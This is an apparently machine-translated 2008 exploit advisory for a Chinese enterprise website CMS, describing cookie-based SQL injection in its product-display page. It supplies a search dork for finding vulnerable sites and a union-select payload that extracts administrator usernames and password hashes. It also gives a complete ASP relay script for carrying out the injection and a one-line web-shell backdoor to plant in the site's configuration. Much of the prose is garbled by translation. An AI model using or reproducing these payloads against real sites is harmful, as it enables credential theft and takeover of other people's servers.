Good fine enterprise website Management System 2 0 0 7-V09 vulnerability-vulnerability warning-the black bar safety net

2008-07-08T00:00:00
ID MYHACK58:62200819593
Type myhack58
Reporter 佚名
Modified 2008-07-08T00:00:00

Description

Relates to version: fine fine enterprise website Management System(2 0 0 7-V09)official commercial version The other version did not do the test /Should be all of the/ Vulnerability file: EnProductShow. asp /subsequent versions/ Product_Show. asp /earlier version/ ProductShow. asp /later versions/ They are actually the same-_-!

Vulnerability description: Variable ID trust the client to submit the value into the sql statement of the query, the procedure with the common SQL anti-injection procedures, detailed in Check_Sql. asp. The key code is as follows


[Copy to clipboard] CODE:

ID=trim(request(”ID”)) if ID=”" then response. Redirect(”EnProduct. asp”) end if sql=”select * from Product where ID=” & ID & “” Set rs= Server. CreateObject(”ADODB. Recordset”) rs. open sql,conn,1,3 if rs. bof and rs. eof then response. write”<SCRIPT language=JavaScript>alert(’cannot find this product!’);” response. write”javascript:history. go(-1)</SCRIPT>” else rs(”Hits”)=rs(”Hits”)+1 rs. update


Check_Sql. asp only to GET and POST data are filtered, ignore the Cookie using the method: Google search keyword inurl:”EnProductShow. asp? id=” cookie injected, the support of the union, the Product table 2 6 fields, the presentation is as follows http://localhost/EnProductShow.asp?ID=229 javascript:alert(document. cookie=”id=”+escape(”2 2 9 union select 0,1,2,3,4,5,6,username,8,password,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5 from admin”)) http://localhost/EnProductShow.asp You can union the administrator account, the password for the md5 value Background address /admin/login. asp Background get the shell method a lot. Skip Added: southern data enterprise website management system ver10. 0, vulnerabilities, and this is the same, the use of the method are substantially the same, just the admin of field number is not the same. /----------xiao. k-notes&complements _20080614----------/ Originally own also in the analysis of this system,since tr4c3 at long before the analysis. I also don't need to see. Found the problem is the union can not alert the pwd. My method is to transfer cookies to injection,script of the prototype from the jmdcw

##################################################

[Copy to clipboard] CODE:

< % ID=request(”ID”)’confirm the id exists! JmdcwName=escape(ID) JmStr=”id=”&amp; JmdcwName url=request(”url”) if request("mod")="1" then url2=”Product_Show. asp” ‘early version else url2=”ProductShow. asp” ‘late version end if Url=”http://”&url&”/”&url2 ‘please modify JMUrl=url JmRef=url JmCok=”ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ” JmCok=JmCok & “;” & amp; Jmstr &”;” JmCok=URLEncoding(JmCok) jmstr=”" response. write PostData(JMUrl,JmStr,JmCok,JmRef) Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server. CreateObject(”msxml2. serverXMLHTTP”) With Http . Open “POST”,PostUrl,False . SetRequestHeader “Content-Length”,Len(PostStr) . SetRequestHeader “Content-Type”,”application/x-www-form-urlencoded” . SetRequestHeader “Referer”,PostRef . SetRequestHeader “Cookie”,PostCok . Send PostStr PostData = . ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = “” For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) strReturn=”" Dim i For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) \&HFF Low1=InnerCode And &HFF strReturn=strReturn & “%” & Hex(Hight1) & “%” & Hex(Low1) End if Next URLEncoding=strReturn End Function % >

##################################################

Saved as cookies. asp usage: http://blog.sadk.org/temp/02/cookies.asp?mod=2&url=admin. asp99. cn/ljweb2007&id=8 0 Note:need to add keywords. id must exist Directly in the configuration written in the mA "%><%execute(request("tmd"))%><%Response. End’